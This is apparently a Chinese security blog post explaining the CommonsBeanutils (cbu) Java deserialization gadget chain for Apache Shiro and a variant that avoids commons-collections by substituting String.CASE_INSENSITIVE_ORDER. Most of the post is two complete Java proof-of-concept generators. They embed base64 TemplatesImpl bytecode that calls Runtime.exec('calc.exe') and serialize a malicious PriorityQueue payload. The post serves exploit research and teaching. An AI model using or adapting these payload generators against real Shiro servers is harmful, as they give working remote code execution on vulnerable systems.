Shiro反序列化的终点cbu和no Cc利用链

前置知识

学习CommonsBeanutils之前应该知道

 1. javaBean,可以看《Java简单特性》也可以看这里
 2. 有关BeanComparator的介绍
 3. TemplatesImpl gadget,前两个方法是public
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()
-> TransletClassLoader#defineClass()

cbu链原理

04929d8497ebfec60f0d8d28198c6441.png

BeanComparator()用于比较两个Java Bean,当property不存在的时候会调用PropertyUtils.getProperty去获取JavaBean的属性,也就是执行getter

恰巧TemplatesImpl#getOutputProperties符合getter的命名规则

Gadget

Gadget chain:
  ObjectInputStream.readObject()
    PriorityQueue.readObject()
      PriorityQueue.heapify()
        PriorityQueue.siftDown()
          siftDownUsingComparator()
            BeanComparator.compare()
              TemplatesImpl.getOutputProperties()
                TemplatesImpl.newTransformer()
                  TemplatesImpl.getTransletInstance()
                    TemplatesImpl.defineTransletClasses()
                      TemplatesImpl.TransletClassLoader.defineClass()
                         Runtime.exec()

Poc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import org.apache.commons.beanutils.BeanComparator;

public class CommonsBeanutils1 {
  public static void main(String[] args) throws Exception {
    String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
    System.out.println(base64encodedString);
  }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj, value);
  }

  public static byte[] getpayload() throws Exception {
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
    TemplatesImpl obj = new TemplatesImpl();
    setFieldValue(obj, "_bytecodes", new byte[][]{code});
    setFieldValue(obj, "_name", "HelloTemplatesImpl");
    setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

    final BeanComparator comparator = new BeanComparator();
    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
    // stub data for replacement later
    queue.add(1);
    queue.add(1);

    setFieldValue(comparator, "property", "outputProperties");
    setFieldValue(queue, "queue", new Object[]{obj, obj});

    ByteArrayOutputStream barr = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(barr);
    oos.writeObject(queue);
    oos.close();

    //本地触发测试
    System.out.println(barr);
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
    Object o = (Object)ois.readObject();

    return barr.toByteArray();
  }
}

Shiro反序列化遇到的困难

 • 本地生成payload的包和远程依赖的包版本不一导致serialVersionID不一致,反序列化失败

a3432f8042ba68a1019e095a05996591.png

 • Shiro自带CommonsBeanutils,不依赖cc。但是Shiro反序列化需要cc 虽然cbu本身依赖cc,但是Shiro中自带的cbu中的类不全,反序列化会失败

d1ee0502174e6c86a4bd4e5565403ad0.png

no CC的Gadge

org.apache.commons.collections.comparators.ComparableComparator在BeanComparator类的构造方法里面被用到,要解决没有cc的时候ClassNotFound的问题就需要替换这个ComparableComparator。

0339fe432f76bdb9ffcf2154cd1d3fcb.png

因为ComparableComparator实现了Comparator接口,替换候选类需要满足:

 • 实现了java.util.Comparatorjava.io.Serializable接口
 • Java,shiro,cbu里面自带

我们去看Comparator接口,看下哪些类实现了他:

93a8f812e8cdcb588553768cb69dfd32.png

java.lang.String.CaseInsensitiveComparator:

542fe3f0911cea2dbae01c3adeeeec14.png

直接通过String.CASE_INSENSITIVE_ORDER就可以获得一个对象

poc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class CommonsBeanutils1Shiro {
  public static void main(String[] args) throws Exception {
    String base64encodedString = Base64.getEncoder().encodeToString(getpayload());
    System.out.println(base64encodedString);
  }

  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj, value);
  }

  public static byte[] getpayload() throws Exception {
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQANQoACwAaCQAbABwIAB0KAB4AHwoAIAAhCAAiCgAgACMHACQKAAgAJQcAJgcAJwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAoAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEADVN0YWNrTWFwVGFibGUHACYHACQBAApTb3VyY2VGaWxlAQAXSGVsbG9UZW1wbGF0ZXNJbXBsLmphdmEMABMAFAcAKQwAKgArAQATSGVsbG8gVGVtcGxhdGVzSW1wbAcALAwALQAuBwAvDAAwADEBAAhjYWxjLmV4ZQwAMgAzAQATamF2YS9pby9JT0V4Y2VwdGlvbgwANAAUAQASSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA9wcmludFN0YWNrVHJhY2UAIQAKAAsAAAAAAAMAAQAMAA0AAgAOAAAAGQAAAAMAAAABsQAAAAEADwAAAAYAAQAAAAsAEAAAAAQAAQARAAEADAASAAIADgAAABkAAAAEAAAAAbEAAAABAA8AAAAGAAEAAAAMABAAAAAEAAEAEQABABMAFAABAA4AAABsAAIAAgAAAB4qtwABsgACEgO2AAS4AAUSBrYAB1enAAhMK7YACbEAAQAMABUAGAAIAAIADwAAAB4ABwAAAA8ABAAQAAwAEgAVABUAGAATABkAFAAdABYAFQAAABAAAv8AGAABBwAWAAEHABcEAAEAGAAAAAIAGQ==");
    TemplatesImpl obj = new TemplatesImpl();
    setFieldValue(obj, "_bytecodes", new byte[][]{code});
    setFieldValue(obj, "_name", "HelloTemplatesImpl");
    setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

    final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
    // stub data for replacement later
    queue.add("1");
    queue.add("1");

    setFieldValue(comparator, "property", "outputProperties");
    setFieldValue(queue, "queue", new Object[]{obj, obj});

    // 生成序列化字符串
    ByteArrayOutputStream barr = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(barr);
    oos.writeObject(queue);
    oos.close();

//    //本地触发测试
//    System.out.println(barr);
//    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
//    Object o = (Object)ois.readObject();

    return barr.toByteArray();
  }
}
updatedupdated2022-10-302022-10-30
加载评论